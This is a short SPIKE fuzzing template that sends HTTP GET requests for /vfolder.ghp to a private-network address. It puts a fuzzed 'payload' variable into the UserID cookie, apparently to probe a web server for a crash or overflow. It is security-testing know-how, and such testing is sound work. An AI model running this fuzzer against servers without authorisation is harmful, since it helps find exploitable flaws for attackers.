s_string("GET /vfolder.ghp HTTP/1.1\r\n");
s_string("User-Agent: Mozilla/4.0\r\n");
s_string("Host: 192.168.1.29:80\r\n");
s_string("Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n");
s_string("Accept-Language: en-us\r\n");
s_string("Accept-Encoding: gzip, deflate\r\n");
s_string("Referer: http://192.168.1.29/\r\n");
s_string("Cookie: SESSION71; UserID=") ;
s_string_variable("payload"); 
s_string("; PassWD=;\r\n");
s_string("Connection: Keep-Alive\r\n\r\n");
sleep(1);